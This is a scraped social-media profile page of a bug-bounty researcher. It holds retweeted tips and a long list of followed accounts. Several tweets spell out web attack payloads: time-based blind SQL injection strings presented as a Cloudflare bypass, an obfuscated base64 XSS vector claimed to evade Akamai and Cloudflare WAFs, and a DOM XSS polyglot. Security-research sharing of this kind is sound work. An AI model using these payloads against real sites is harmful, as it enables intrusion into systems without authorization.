Petru Surugiu @pedro_infosec
Joined March 2012-
Tweets605
-
Followers68
-
Following1K
-
Likes33
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
Found a great waf bypass for client side path traversal (a thread)
have you tried this site for xss payload ? tinyxss.terjanq.me
I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
Typical CSS injection often relies on repeated context loading (usually via iframes) to exfiltrate sensitive tokens. I found this tool by @ixSly that's both fast and works in Chrome and Safari. It can leak tokens with just a single CSS import by leveraging -webkit-cross-fade 🤯…
Path traversal opens doors to secrets, source code and even RCE when chained with other exploits 📂 Level up your #BugBounty hunting skills with our practical guide to path traversal and arbitrary file read attacks 👇 yeswehack.com/learn-bug-boun…
HTTP Headers Every Hacker Should Know (Bypass Techniques)
Just released a new recollapse version thanks to @ryancbarnett and @4ng3lhacker after their talk in @BlackHatEvents today. What’s new? 💥Mode 6: Fuzz case folding/upper/lower 💥 Mode 7: Fuzz byte truncations 💥 Recollapse is now available to use as a python library and…
Top 10 #XSS Payloads By @RodoAssis #BugBounty #PenTesting rodoassis.medium.com/top-10-xss-pay…
Is your target leaking CSP violations left and right? Mikhail Khramenkov reveals how to hijack the onsecuritypolicyviolation event to trigger JS in hidden inputs - when unsafe-inline is in play and styles are blocked. Now live on our XSS cheat sheet. Link to vector👇
Recently, I was testing application and the injection was inside the image tag where src attribute has the valid image path I can break out using " however <> were encoded into HTML entities. I can use other event handlers like onmousever to trigger the XSS. 1/n
Ambiguous URLs are behind many SSRF, CORS, and redirect flaws, but most bypasses are scattered and undocumented. This cheat sheet consolidates payloads, encodings, and IP tricks into one place to assist your testing. Check it out: portswigger.net/web-security/s…
A DOM-Based #XSS Polyglot 1;/*'"><Img/Src/OnError=/**/confirm(1)//> If your input happens to end up in the DOM via innerHTML or eval(), it works for both cases. PoCs below. innerHTML: x55.is/brutelogic/dom… eval(): x55.is/brutelogic/dom…
When HTTP/1.1 Must Die lands at DEFCON we’ll publish a @WebSecAcademy lab with a new class of desync attack. One week later, I’ll livestream the solution on air with @offby1security! You’re invited :) youtube.com/live/B7p8dIB7b…
Time-Based SQLI Payload: /(select(0)from(select(sleep(9)))v)/*'%2B(select(0)from(select(sleep(9)))v)%2B'"%2B(select(0)from(select(sleep(9)))v)%2B"*/
A Very Cool Header Exploitation HTTP github.com/c0dejump/HExHT… Dont Forget save it.
💡 Bug bounty tip: Archived JS files can expose hidden URLs, forgotten APIs & admin panels. Use this recon trick to level up your game. 👉 blogs.jsmon.sh/extract-urls-f… #BugBounty #Recon #JavaScript #InfoSec #HackingTips
"Funky chunks: abusing ambiguous chunk line terminators for request smuggling" - quality research by @__w4ke! Also thankfully it doesn't overlap with my upcoming presentation 😅 w4ke.info/2025/06/18/fun…
Sean Beatty @SeanBeatty56262
49 Followers 1K Following
pawlo @teodor440
3 Followers 69 Following
Laluka@OffenSkill @TheLaluka
5K Followers 1K Following Sharing is Caring, Hacker, Eternel Learner, Cat! =^~^=
Eusebiu Blindu @testalways
12K Followers 9K Following General stuff, tech, security, travel. testing. Movie extra in Borat, Bloodrayne. Puzzles, comments, opinions
episodexonx @episodexonx
0 Followers 8 Following
adk @andreigrigoruta
211 Followers 487 Following Living in the simulation. #Bitcoin #Elrond #TSLA🚘⚡🔋 #SpaceX 🌎 #Starship 🚀
iosifache @iosifache
167 Followers 416 Following security @ snap | security @ ubuntu, cybersec startup lead, officer in previous lives | software security, open source
Oste @oste_ke
7K Followers 6K Following ᴄʏʙᴇʀꜱᴇᴄᴜʀɪᴛʏ | ᴅꜰɪʀ 🛡️. ᴄᴛꜰ ᴘʟᴀʏᴇʀ @fr334aksmini | ꜰᴏᴜɴᴅɪɴɢ ʙᴏᴀʀᴅ ᴍᴇᴍʙᴇʀ @hih_community | #OpenSource ᴛɪɴᴋᴇʀᴇʀ | 𝕏 |
termtype @termtype
507 Followers 3K Following eval('al' + 'er' + 't(\'' + '@termtype ownz yew by default' + '\')');
Prem @prem_kakkassery
10 Followers 268 Following
vladz @v14dz
301 Followers 524 Following
Graphics World @RobinHooD_BD
160 Followers 2K Following I am a Graphics Designer. Order at [email protected]🤠
Brutal Secrets @brutalsecrets
271 Followers 297 Following Private results of @brutelogic research including vectors/payloads, techniques and tools. Getting back soon.
WebmasterAZ @webmasteraz
211 Followers 1K Following Follow #webmasteraz to get #deals #specialoffers for #domain, #webhosting and other tools for Webmaster. From A to Z
OpenDocument @opendocument
5K Followers 4K Following Welcome to the unofficial OpenDocument Format channel on Twitter. General information in English, Spanish or Portuguese. News, tips, tricks, apps and more!
BlackHatCoupons @CouponsBlackHat
263 Followers 3K Following Unbelievable coupon savings and shopping deals for your favorite blackhat software, services, and more - fresh new coupons always at your fingertips!
Asif baig @AsifBaig330
61 Followers 756 Following Founder & CTO @ Veracity Info Parks CISSP, C|EH Certified | Penetration tester | Bug Bounty Hunter 😎
gabriel lawrence @gebl
2K Followers 3K Following mastodon: https://t.co/Cn4uf9OJdY #BlackLivesMatter #StopSystemicOppression he/him
harisec @har1sec
8K Followers 3K Following Interested in web security, bug bounties, machine learning and investing. SolidGoldMagikarp. Orson Kovacs.
Stacy Hargreaves @auriemma23
70 Followers 623 Following Team leader at a Sixant Marketing. All view my own.
Marketing Duchess @PalaceGirl7
212 Followers 947 Following Did you see what I did there? No? Good. Online marketing girl.
JessTDrake @JessTDrake
125 Followers 999 Following Must stop eating cake, love movies, games, gym, just normal stuff. Mom.
Alexis Dawood @Alexis_Dawood
1K Followers 2K Following Fixated with marketing my online business, blogging and learning. Will only follow people I think I can learn from and perhaps JV with.
JS0N Haddix @Jhaddix
167K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Juana Renburg @Juana_Renburg
298 Followers 2K Following Blogger, social media marketing girl, own business and like to travel.
Helen Coffens @helenekhgf8o1
81 Followers 611 Following Run an online marketing agency with my man, always looking to team up and share information.
Kallie Manual @Kallie_Manual
201 Followers 1K Following Marketing blogger, now reaching 7K readers every day. Loving the fact people share my passion.
Laura Carlmorris @VILLAgirl999
242 Followers 1K Following Self employed writer, affiliate marketer and all round money grabber.
Janine Hamb @Janine_Hamb
252 Followers 2K Following Blogger, Online Marketer, work part time for a digital marketing agency. Happy to share what I know.
Lida Bory @Lida_Bory
2K Followers 2K Following Online marketing blogger, content marketing expert. Always looking to share great information and JV.
Mezza Kayles @CastleGirl79
210 Followers 1K Following Intelligent and modest, I make niche affiliate websites and even make money.
Cherry Hayles @foxesfox88
276 Followers 956 Following A rare female breed of php developer and content writer. Always looking to network.
Melvin Shadrick @MelvinShadrick
70 Followers 597 Following I love learning about SEO, marketing and all related things.
Toddy Boy @TrudeauTodd
60 Followers 743 Following Internet marketing, coding, writing, making money. Skydiver.
Kerry Hayles @cahoola
411 Followers 2K Following Fashion blog owner. Also dabble with affiliate marketing.
Jenni Kerrigan @BroadwayMacken1
62 Followers 710 Following Expert affiliate marketer, passionate about all online business.
Rodrigo Escobar @ipaxdc
812 Followers 920 Following Sr. Malware Research Mgr @ GoDaddy / Sucuri Inc. | Web Malware Analysis | Reverse Eng | Passionate about protecting the Web | Tweets and Thoughts are my own
Damaris Grona @Damaris_Grona
190 Followers 1K Following No seriously, I tweet too much, don't get my tweets on yr phone.
un1tycyb3r @un1tycyb3r
569 Followers 175 Following Application Pentester - Best Faith Security Researcher
sw33tLie @sw33tLie
10K Followers 909 Following Web application hacker, 25yo. Top 30 @ https://t.co/wX0yr85Tzk https://t.co/ZI7a8oJJcQ https://t.co/LGYK7tMOGo
xploiterr @_xploiterr
2K Followers 905 Following Let everything happen to you, just keep going… like she said. ✍️ Write-ups → https://t.co/2ki4J3756e
Martin Doyhenard @tincho_508
3K Followers 227 Following Security Researcher at PortSwigger. Speaker at BlackHat, DEF CON, RSA, Hack In The Box, Troopers, EkoParty
xssdoctor @xssdoctor
4K Followers 372 Following hacker and cardiologist… not necessarily in that order
Brian Smith @sirwart
1K Followers 303 Following
Justin Gardner @Rhynorater
35K Followers 2K Following Christian | Full-time Bug Bounty Hunter | Host of @ctbbpodcast | Advisor @CaidoIO | 4x LHE MVH | 🗣️ English, 日本語 | ♥️ @mariahchan_ ♥️
pawlo @teodor440
3 Followers 69 Following
Laluka@OffenSkill @TheLaluka
5K Followers 1K Following Sharing is Caring, Hacker, Eternel Learner, Cat! =^~^=
Rebane @rebane2001
7K Followers 2K Following 🇪🇪🏳️⚧️ | Archivist | 9 CVEs in Chrome | CSS noob | MapartCraft | Horse | rebane2001#3716 | Lyra 🦊 @[email protected]
chompie @chompie1337
83K Followers 1K Following hacker, weird machine mechanic, X-Force Offensive Research (XOR)
Ebrietas @Ebrietas0
5K Followers 188 Following Security @ Phantom Wallet, former TikTok & Blizzard. All tweets are my own.
Assetnote @assetnote
10K Followers 0 Following Assetnote combines advanced reconnaissance and high-signal continuous security analysis to help enterprises gain insight and control of their evolving exposure.
张惠倩 @momika233
18K Followers 222 Following Anda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!! If you have any questions, please contact me https://t.co/MkzsavUU9V
KNOXSS @KN0X55
15K Followers 0 Following Announcements, tips and support via DM of KNOXSS - Online #XSS PoC Tool by @BRuteLogic
Kévin GERVOT (Mizu) @kevin_mizu
6K Followers 755 Following Researcher for @ctbbpodcast lab 🐛 | DOMLogger++ developer 👨🏻💻 | CTF with @FlatNetworkOrg, @rhackgondins 🦦 | @ECSC_TeamFrance 2023 🇫🇷
anna @meowkoteeq
12K Followers 527 Following calico cat, trans girl, lesbian, she/any. most posts are unserious. head of sales at @flipper_zero, but opinions are my own. 🐈❤️🐈⬛
Will Schroeder @harmj0y
48K Followers 957 Following Researcher @SpecterOps. Coding towards chaotic good while living on the decision boundary.
Luke Stephens (hakluk... @hakluke
95K Followers 2K Following Hacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
Godfather Orwa 🇯�... @GodfatherOrwa
24K Followers 2K Following Hacker | Bug Hunter | Cooker | Top 5 P1 Warrior On https://t.co/dzFQH75OWj | LevelUpX Champion | 10+ 0Days/CVEs
Rodolfo Assis @RodoAssis
10K Followers 119 Following That #XSS and #WAF #bypass guy. @BRuteLogic @KN0X55
Shebu @_sh3bu
922 Followers 960 Following Product Security @Philips | Masters in CyberSecurity @AMRITAedu https://t.co/z0UsaqFOJ0
Tib3rius @0xTib3rius
68K Followers 586 Following High Queen of the Cybers | Educator | Content Creator | UwU-Anointed Wapp King | Ex-Brit | https://t.co/04RRExvxXj (he/him) 🇺🇸 I run gameshows at DEF CON.
adk @andreigrigoruta
211 Followers 487 Following Living in the simulation. #Bitcoin #Elrond #TSLA🚘⚡🔋 #SpaceX 🌎 #Starship 🚀
Andreas Finstad - (4n... @4nqr34z
1K Followers 270 Following C|EH, C|NDA, MCP, CCNA, AWSC. @nRadioApp. Cyber Security Researcher/Specialist Youtube: https://t.co/jvTq9LlcA6 Mastodon: [email protected] #infosec
ShimizuKawasaki @shimizukawasak
1K Followers 113 Following
FatalSec @SecFatal
476 Followers 92 Following Technology enthusiast and mobile security researcher experienced in pentesting of mobile apps. Reach out at [email protected] for technical consultation.
Anysphere @anysphere
7K Followers 7 Following We're building AI tools to help humans focus on bigger problems. In particular: @cursor_ai
jswzl @WeaselJs
1K Followers 1 Following jswzl helps make web application testing easier with static analysis, making it easier to audit JS code and do your recon/mapping
Burp Suite Ninja🥷 @BurpSuiteNinja
399 Followers 1 Following Unleash the ninja within at https://t.co/Qhc8K1TD9a by SecProject Ltd. - This account is not affiliated with PortSwigger
stacksmashing @ghidraninja
48K Followers 452 Following Security researcher with a focus on hardware & firmware. I occasionally publish stuff on YouTube. Co-founder of @hextreeio. Contact: [email protected]
Riccardo Pau @profxeni
776 Followers 347 Following #OSint and Digital Forensics Specialist, Cyber-Investigator, Tech Enthusiast, #debunker. https://t.co/2DYU06UIvv
Stacy Hargreaves @auriemma23
70 Followers 623 Following Team leader at a Sixant Marketing. All view my own.
Asif baig @AsifBaig330
61 Followers 756 Following Founder & CTO @ Veracity Info Parks CISSP, C|EH Certified | Penetration tester | Bug Bounty Hunter 😎
WebmasterAZ @webmasteraz
211 Followers 1K Following Follow #webmasteraz to get #deals #specialoffers for #domain, #webhosting and other tools for Webmaster. From A to Z
Graphics World @RobinHooD_BD
160 Followers 2K Following I am a Graphics Designer. Order at [email protected]🤠Trends for United States
You might like
